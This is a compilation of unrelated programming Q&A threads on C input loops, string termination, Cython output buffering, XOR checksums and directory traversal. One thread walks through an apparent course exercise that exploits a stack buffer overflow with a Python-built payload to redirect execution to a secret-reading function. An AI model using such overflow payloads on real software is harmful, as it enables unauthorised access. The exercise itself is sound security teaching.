For loop in C breaks randomly - python

I've been struggling with this loop in C for a while now. I'm trying to fill a string array in a for loop (I'm not sure I'm doing it correctly). Every time I enter a string with a space in it, the for loop breaks and skips all remaining iterations. For example, if I type S 1 on the command line, it breaks.
This is the code:
#include <stdlib.h>
#include <stdio.h>
#include <math.h>
#include <string.h>
int main(){
    int players;
    int jerseys;
    int count = 0;
    int i;
    scanf("%d", &jerseys);
    scanf("%d", &players);
    char size[jerseys], p[players][100];
    for(jerseys; jerseys > 0; jerseys--){
        scanf(" %c", &size[count]);
        count++;
    }
    getchar();
    count = 0;
    for(players; players>0; players--){
        /*scanf(" %s", p[0] ); */ /*you cant assign arrays in C.*/
        getchar();
        fgets(p[count], 100, stdin);
        printf("%s", p[count]);
        printf("%s", p[count][2]); /* LINE 29 */
        printf("Hello\n");
        count ++;
    }
    return 0;
}
Moreover, on line 29, if I change the index from 2 to 1, the loop instantly breaks, no matter what I put.
I have Python code that does essentially what I want from the C version:
given = []
jerseys = int(input())
if jerseys == 0:
    print(0)
players = int(input())
j = []
requests = 0
for _ in range(jerseys):
    size = input()
    j.append(size)
for _ in range(players):
    p = input().split()
I've looked at many places, and I think the problem is with the array, not the new lines, but I have no clue.
Edit:
This is what the input I want to give (and what I usually try) looks like:
3
3
S
M
L
S 1
S 3
L 2

If the input characters do not match the format string, or are of the wrong type for a conversion, scanf stops and leaves the offending character as the next character to be read.
If you type 1` on the command line, jerseys is set to 1, but players is never assigned because the ` does not match the %d format. So in your program, players may hold an arbitrary, possibly very large, value.
So when you use scanf, you had better check the return value, like this:
if (scanf("%d", &players) != 1) {
    /* error handle */
}
When I ran the code, it raised a segmentation fault.

The posted code does not compile cleanly!
Here is the output from the gcc compiler:
gcc -ggdb3 -Wall -Wextra -Wconversion -pedantic -std=gnu11 -c "untitled.c" -o "untitled.o"
untitled.c: In function ‘main’:
untitled.c:17:5: warning: statement with no effect [-Wunused-value]
   17 |     for(jerseys; jerseys > 0; jerseys--){
      |     ^~~
untitled.c:24:5: warning: statement with no effect [-Wunused-value]
   24 |     for(players; players>0; players--){
      |     ^~~
untitled.c:29:18: warning: format ‘%s’ expects argument of type ‘char *’, but argument 2 has type ‘int’ [-Wformat=]
   29 |         printf("%s", p[count][2]); /* LINE 29 */
      |                 ~^   ~~~~~~~~~~~
      |                  |             |
      |                  char *        int
      |                 %d
untitled.c:10:9: warning: unused variable ‘i’ [-Wunused-variable]
   10 |     int i;
      |         ^
Compilation finished successfully.
Please correct the code AND check the returned status from the C library I/O functions.
Regarding:
Compilation finished successfully.
Since the compiler output several warnings, this statement only means that the compiler made some (not necessarily correct) guesses as to what you meant.


If all strings either need a length or null terminator, how do high level languages just construct a string with chars?

So I am writing some C code to play around with mocking up a scripting language.
I ran into a scenario where, if I run a function to import a file, say import("file.c"), I cannot necessarily use a pointer because it is not null terminated. I would also need to give the length of the string like import("file.c", 5) or use a null terminating character import("file.c\0"). I assume using a buffer is the way to go, with a fixed size such as char file_name[256], which is probably large enough for a file name. But that raises some interesting questions regarding 'higher' level programming languages like, say, Python or Golang. From an internet search, Golang's imports look like this:
import (
"fmt"
"math"
)
I would assume the libraries are being treated as strings, no? What about Python?
import pandas as pd
import math
import functools
Are those also being treated as strings? At least, to me, I would assume golang's imports are.
But let's forget imports entirely. What about just strings?
Python's string is:
s = "I like Apple Pie"
I saw here that strings in golang are defined as:
type _string struct {
elements *byte // underlying bytes
len int // number of bytes
}
Then the next segment of code says:
const World = "world"
where there is no len specified. What gives?
How does golang, or in general, 'higher' level languages make use of strings without having to specify a null terminated string or the length with a number? Or am I missing something entirely?
I come from a Python background with some C but it seems pretty similar in most programming languages today.
The fact that you don't write string length or the null terminating character for a string literal does not mean that it cannot be done automatically: the compiler can do it (because it knows the string length at compilation time) and is very likely doing it.
For example in C:
The null character ('\0', L'\0', char16_t(), etc) is always
appended to the string literal: thus, a string literal "Hello" is a
const char[6] holding the characters 'H', 'e', 'l', 'l', 'o', and
'\0'.
Here is a small C program that shows that a null character is appended to a string literal:
#include <stdio.h>
#include <string.h>
int main()
{
    char *p="hello";
    int i;
    i = 0;
    while (p[i] != '\0')
    {
        printf("%c ", p[i]);
        i++;
    }
    printf("\nstrlen(p)=%zu\n", strlen(p)); /* strlen returns size_t, so use %zu */
    return 0;
}
Execution:
./hello
h e l l o
strlen(p)=5
You can also compile the program in debug mode with:
gcc -g -o hello -Wall -pedantic -Wextra hello.c
and check with gdb:
gdb hello
...
(gdb) b main
Breakpoint 1 at 0x400585: file hello.c, line 6.
(gdb) r
Starting program: /home/pifor/c/hello
Breakpoint 1, main () at hello.c:6
6 char *p="hello";
(gdb) n
9 i = 0;
(gdb) print *(p+5)
$7 = 0 '\000'
(gdb) print *(p+4)
$8 = 111 'o'
(gdb) print *p
$10 = 104 'h'
A string value in Go is a pointer to bytes and a length. Here's Go's definition of the type:
type StringHeader struct {
Data uintptr
Len int
}
In the case of a string literal like "world", the compiler counts the bytes to set the length. The literal is represented by StringHeader{Data: pointerToBytesWorld, Len: 5} at runtime.
When a string value is produced by a slice expression, its length follows from the slice operands:
s := "Hello"
s = s[1:4] // length is 4 - 1 = 3
String conversions take the length from the operand:
b := []byte{'F', 'o', 'p'}
s = string(b) // length is 3, same as len(b)
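To see both conventions side by side from Python, here is a minimal sketch using the standard ctypes module. It only illustrates the two answers above: a C-style buffer gets a terminator appended for you, while a Python bytes object carries its own length, so an embedded zero byte is just data. The variable names are made up for the example.

```python
import ctypes

literal = b"hello"

# C convention: create_string_buffer appends the terminating NUL for us,
# much as a C compiler does for the literal "hello".
buf = ctypes.create_string_buffer(literal)
print(ctypes.sizeof(buf))   # 6: five characters plus the terminator
print(buf.raw)              # b'hello\x00'

# Length-carrying convention: the object stores its own length.
print(len(literal))         # 5

# An embedded NUL shows the difference between the two views.
embedded = ctypes.create_string_buffer(b"a\0b")
print(embedded.value)       # b'a'  (C view: stops at the first NUL)
print(embedded.raw)         # b'a\x00b\x00'  (all bytes, plus terminator)
print(len(b"a\0b"))         # 3  (length-based view keeps everything)
```

In neither case does the programmer write the length or the terminator by hand; the tooling computes it from the literal.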

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, so that vuln returns to the read_secret function instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kind of confused. I know that I would have to replace the return address into main() with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you get a segfault. In your case I assume it's 1026. The whole game is to overwrite the saved eip (which tells the program what to execute next) with an address of your choosing.
To do that you need to know the address of the function you want to run, so open your program in gdb and type in:
x function_name
Then copy the address. You then have to convert it to big- or little-endian byte order. I do it with the struct module in Python.
import struct
struct.pack("<I", address) # "<I" is little-endian; for big-endian use ">I"
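As a small illustration of what that conversion does, here is a Python 3 sketch. The address is a made-up 32-bit value chosen only for the example, not one taken from the binary in the question.

```python
import struct

# Hypothetical 32-bit address, for illustration only.
address = 0x080484B6

little = struct.pack("<I", address)   # least significant byte first
big = struct.pack(">I", address)      # most significant byte first

print(little)   # b'\xb6\x84\x04\x08'
print(big)      # b'\x08\x04\x84\xb6'

# Unpacking with the same format gives the original number back.
print(hex(struct.unpack("<I", little)[0]))   # 0x80484b6
```

On x86 the little-endian form is the one that matches how the value is laid out in memory.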
Then you have to add it to your input to the binary. Note that vuln takes its input from argv[1], not from stdin, so pass the payload as an argument, something like:
/task2/vuln "$(python -c "print 'a' * 1026 + 'the_address'")"
#on bash shell, not in script
If this doesn't work, add a few more characters to your offset. Other locals, saved registers or padding may sit between the buffer and the return address.
/task2/vuln "$(python -c "print 'a' * 1034 + 'the_address'")"
Hope that answers your question.

Cython print() outputs before C printf(), even when placed afterwards

I'm trying to pick up Cython.
import counter
cdef public void increment():
    counter.increment()
cdef public int get():
    return counter.get()
cdef public void say(int times):
    counter.say(times)
This is the "glue code" I'm using to call functions from counter.py, a pure Python source code file. It's laid out like this:
count = 0
def increment():
    global count
    count += 1
def get():
    global count
    return count
def say(times):
    global count
    print(str(count) * times)
I have successfully compiled and run this program. The functions work fine. However, a very strange thing occurred when I tested this program:
int main(int argc, char *argv[]) {
Py_Initialize();
// The following two lines add the current working directory
// to the environment variable `PYTHONPATH`. This allows us
// to import Python modules in this directory.
PyRun_SimpleString("import sys");
PyRun_SimpleString("sys.path.append(\".\")");
PyInit_glue();
// Tests
for (int i = 0; i < 10; i++)
{
increment();
}
int x = get();
printf("Incremented %d times\n", x);
printf("The binary representation of the number 42 is");
say(3);
Py_Finalize();
return 0;
}
I would expect the program to produce this output:
Incremented 10 times
The binary representation of the number 42 is
101010
However, it prints this:
Incremented 10 times
101010
The binary representation of the number 42 is
But if I change the line
printf("The binary representation of the number 42 is");
to
printf("The binary representation of the number 42 is\n");
then the output is corrected.
This seems strange to me. I understand that if I want to print the output of a Python function, I might just as well return it to C and store it in a variable, and use C's printf() rather than the native Python print(). But I would be very interested to hear the reason this is happening. After all, the printf() statement is reached before the say() statement (I double checked this in gdb just to make sure). Thanks for reading.
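One likely explanation, offered here as an assumption rather than something confirmed in this thread, is output buffering: C's stdio and Python's sys.stdout each keep their own buffer, and when writing to a terminal both are typically flushed when a newline arrives. The sketch below is a toy model in plain Python. The LineBuffered class and the terminal list are invented for the illustration and are not part of Cython or CPython.

```python
class LineBuffered:
    """Toy model of a line-buffered stream: text is held until a newline arrives."""

    def __init__(self, sink):
        self.sink = sink      # shared "terminal": chunks in the order they arrive
        self.pending = ""     # text written but not yet flushed

    def write(self, text):
        self.pending += text
        if "\n" in text:      # a newline triggers a flush
            self.flush()

    def flush(self):
        if self.pending:
            self.sink.append(self.pending)
            self.pending = ""


terminal = []
c_stdout = LineBuffered(terminal)    # stands in for C's stdio buffer
py_stdout = LineBuffered(terminal)   # stands in for Python's sys.stdout buffer

c_stdout.write("Incremented 10 times\n")
c_stdout.write("The binary representation of the number 42 is")  # no newline: stays buffered
py_stdout.write("101010\n")          # print() ends with a newline, so it is flushed at once
c_stdout.flush()                     # the C buffer is only flushed at program exit

print("".join(terminal))
```

The model reproduces the order seen in the question. If this is indeed the cause, ending the printf() string with a newline (as the question found) or calling fflush(stdout) before say(3) should restore the expected order.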

Python: XOR each character in a string

I'm trying to validate a checksum on a string which in this case is calculated by performing an XOR on each of the individual characters.
Given my test string:
check_against = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
I figured it would be as simple as:
result = 0
for char in check_against:
result = result ^ ord(char)
I know the result should be 28, however my code gives 40.
I'm not sure what encoding the text is supposed to be in, although I've tried encoding/decoding in utf-8 and ascii, both with the same result.
I implemented this same algorithm in C by simply doing an XOR over the char array with perfect results, so what am I missing?
Edit
So it was a little while ago that I implemented what I thought was the same thing in C. I knew it was in an Objective-C project, but I thought I had just done it this way. Totally wrong: first there was a step where I parsed the checksum string value at the end as hex, like so (I'm filling some things in here so that I'm only pasting what is relevant):
unsigned int checksum = 0;
NSScanner *scanner = [NSScanner scannerWithString:@"26"];
[scanner scanHexInt:&checksum];
Then I did the following to compute the checksum:
NSString *sumString = @"GPGLL,5300.97914,N,00259.98174,E,125926,A";
unsigned int sum = 0;
for (int i=0;i<sumString.length;i++) {
    sum = sum ^ [sumString characterAtIndex:i];
}
Then I would just compare like so:
return sum == checksum;
So, as @metatoaster, @XD573, and some others in the comments have helped figure out, the issue was the difference between the computed result, which was in base 10, and my expected value, which was in base 16.
The result of the code, 40, is correct in base 10; the value I was trying to achieve, 28, is given in base 16. Simply converting the expected value from base 16 to base 10, for example like so:
int('28', 16)
I get 40, the computed result.
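Putting the pieces together, a minimal Python 3 sketch of the whole check might look like this. The function name xor_checksum and the variable names are made up for the example; the sentence and the expected value "28" come from the question.

```python
from functools import reduce
from operator import xor


def xor_checksum(text):
    """XOR together the byte values of an ASCII string."""
    return reduce(xor, text.encode("ascii"), 0)


sentence = "GPGLL,5300.97914,N,00259.98174,E,125926,A"
expected_hex = "28"   # the checksum as it appears in the data, written in base 16

computed = xor_checksum(sentence)
print(computed)                            # 40
print(format(computed, "02X"))             # 28
print(computed == int(expected_hex, 16))   # True
```

Either direction works: parse the expected string as base 16 and compare integers, or format the computed value as two hex digits and compare strings.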
#python3
s = "GPGLL,5300.97914,N,00259.98174,E,125926,A"  # renamed from str to avoid shadowing the built-in
cks = 0
i = 0
while(i<len(s)):
    cks^=ord(s[i])
    i+=1
print("hex:",hex(cks))
print("dec:",cks)
I created the C version as shown here:
#include <stdio.h>
#include <string.h>
int main()
{
    const char *str1 = "GPGLL,5300.97914,N,00259.98174,E,125926,A";
    int sum = 0;
    size_t i;
    for (i = 0; i < strlen(str1); i++) {
        sum ^= str1[i];
    }
    printf("checksum: %d\n", sum);
    return 0;
}
And when I compiled and ran it:
$ gcc -o mytest mytest.c
$ ./mytest
checksum: 40
Which leads me to believe that your assumptions about your equivalent C code are incorrect.

Reasonably faster way to traverse a directory tree in Python?

Assuming that the given directory tree is of reasonable size: say an open source project like Twisted or Python, what is the fastest way to traverse and iterate over the absolute path of all files/directories inside that directory?
I want to do this from within Python. os.path.walk is slow. So I tried ls -lR and tree -fi. For a project with about 8337 files (including tmp, pyc, test, .svn files):
$ time tree -fi > /dev/null
real 0m0.170s
user 0m0.044s
sys 0m0.123s
$ time ls -lR > /dev/null
real 0m0.292s
user 0m0.138s
sys 0m0.152s
$ time find . > /dev/null
real 0m0.074s
user 0m0.017s
sys 0m0.056s
$
tree appears to be faster than ls -lR (though ls -R is faster than tree, but it does not give full paths). find is the fastest.
Can anyone think of a faster and/or better approach? On Windows, I may simply ship a 32-bit binary tree.exe or ls.exe if necessary.
Update 1: Added find
Update 2: Why do I want to do this? ... I am trying to make a smart replacement for cd, pushd, etc.. and wrapper commands for other commands relying on passing paths (less, more, cat, vim, tail). The program will use file traversal occasionally to do that (eg: typing "cd sr grai pat lxml" would automatically translate to "cd src/pypm/grail/patches/lxml"). I won't be satisfied if this cd replacement took, say, half a second to run. See http://github.com/srid/pf
Your approach in pf is going to be hopelessly slow, even if os.path.walk took no time at all. Doing a regex match containing 3 unbounded closures across all extant paths will kill you right there. Here is the code from Kernighan and Pike that I referenced; it is a proper algorithm for the task:
/* spname: return correctly spelled filename */
/*
* spname(oldname, newname) char *oldname, *newname;
* returns -1 if no reasonable match to oldname,
* 0 if exact match,
* 1 if corrected.
* stores corrected name in newname.
*/
#include <sys/types.h>
#include <sys/dir.h>
spname(oldname, newname)
char *oldname, *newname;
{
char *p, guess[DIRSIZ+1], best[DIRSIZ+1];
char *new = newname, *old = oldname;
for (;;) {
while (*old == '/') /* skip slashes */
*new++ = *old++;
*new = '\0';
if (*old == '\0') /* exact or corrected */
return strcmp(oldname,newname) != 0;
p = guess; /* copy next component into guess */
for ( ; *old != '/' && *old != '\0'; old++)
if (p < guess+DIRSIZ)
*p++ = *old;
*p = '\0';
if (mindist(newname, guess, best) >= 3)
return -1; /* hopeless */
for (p = best; *new = *p++; ) /* add to end */
new++; /* of newname */
}
}
mindist(dir, guess, best) /* search dir for guess */
char *dir, *guess, *best;
{
/* set best, return distance 0..3 */
int d, nd, fd;
struct {
ino_t ino;
char name[DIRSIZ+1]; /* 1 more than in dir.h */
} nbuf;
nbuf.name[DIRSIZ] = '\0'; /* +1 for terminal '\0' */
if (dir[0] == '\0') /* current directory */
dir = ".";
d = 3; /* minimum distance */
if ((fd=open(dir, 0)) == -1)
return d;
while (read(fd,(char *) &nbuf,sizeof(struct direct)) > 0)
if (nbuf.ino) {
nd = spdist(nbuf.name, guess);
if (nd <= d && nd != 3) {
strcpy(best, nbuf.name);
d = nd;
if (d == 0) /* exact match */
break;
}
}
close(fd);
return d;
}
/* spdist: return distance between two names */
/*
* very rough spelling metric:
* 0 if the strings are identical
* 1 if two chars are transposed
* 2 if one char wrong, added or deleted
* 3 otherwise
*/
#define EQ(s,t) (strcmp(s,t) == 0)
spdist(s, t)
char *s, *t;
{
while (*s++ == *t)
if (*t++ == '\0')
return 0; /* exact match */
if (*--s) {
if (*t) {
if (s[1] && t[1] && *s == t[1]
&& *t == s[1] && EQ(s+2, t+2))
return 1; /* transposition */
if (EQ(s+1, t+1))
return 2; /* 1 char mismatch */
}
if (EQ(s+1, t))
return 2; /* extra character */
}
if (*t && EQ(s, t+1))
return 2; /* missing character */
return 3;
}
Note: this code was written long before ANSI C, ISO C, or anything POSIX was even imagined, back when one read directory files raw. The approach of the code is far more useful than all the pointer slinging.
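Since the question is about doing this from Python, here is a rough Python 3 port of the spdist metric above. It is a sketch that follows the C logic branch by branch, not code from Kernighan and Pike, and the example names are taken from the path in the question.

```python
def spdist(s, t):
    """Rough spelling distance between two names.

    0 if identical, 1 if two chars are transposed,
    2 if one char is wrong, added or deleted, 3 otherwise.
    """
    if s == t:
        return 0
    # Skip the common prefix, as the C while loop does.
    i = 0
    while i < len(s) and i < len(t) and s[i] == t[i]:
        i += 1
    s, t = s[i:], t[i:]
    if s:
        if t:
            if (len(s) > 1 and len(t) > 1 and s[0] == t[1]
                    and t[0] == s[1] and s[2:] == t[2:]):
                return 1          # transposition
            if s[1:] == t[1:]:
                return 2          # one char mismatch
        if s[1:] == t:
            return 2              # extra character
    if t and s == t[1:]:
        return 2                  # missing character
    return 3


print(spdist("lxml", "lxml"))        # 0
print(spdist("grial", "grail"))      # 1
print(spdist("patchs", "patches"))   # 2
print(spdist("abc", "xyz"))          # 3
```

As in mindist, the idea is to compare each typed component only against the entries of one directory at a time, rather than matching a pattern against every path in the tree.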
It would be hard to do much better than find in performance, but the question is how much faster, and why do you need it to be so fast? You claim that os.path.walk is slow; indeed, it is ~3 times slower on my machine over a tree of 16k directories. But then again, we're talking about the difference between 0.68 seconds and 1.9 seconds for Python.
If setting a speed record is your goal, you can't beat hand-coded C, which is 75% system call bound, and you can't make the OS go faster. That said, 25% of the Python time is spent in system calls. What is it that you want to do with the traversed paths?
One solution you have not mentioned is 'os.walk'. I'm not sure it'd be any faster than os.path.walk, but it's objectively better.
You have not said what you're going to do with the list of directories when you have it, so it's hard to give more specific suggestions.
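For reference, a minimal os.walk version that yields the absolute path of every file and directory could look like the sketch below (Python 3). The helper name iter_paths is made up for the example, and no claim is made here about how its speed compares with find.

```python
import os


def iter_paths(root):
    """Yield the absolute path of every directory and file under root."""
    root = os.path.abspath(root)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            yield os.path.join(dirpath, name)


if __name__ == "__main__":
    for path in iter_paths("."):
        print(path)
```

Because os.walk is a generator, a caller that is looking for a single match can stop iterating early instead of listing the whole tree first.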
Although I doubt you have multiple read heads, here's how you can traverse a few million files (we've done 10M+ in a few minutes).
https://github.com/hpc/purger/blob/master/src/treewalk/treewalk.c
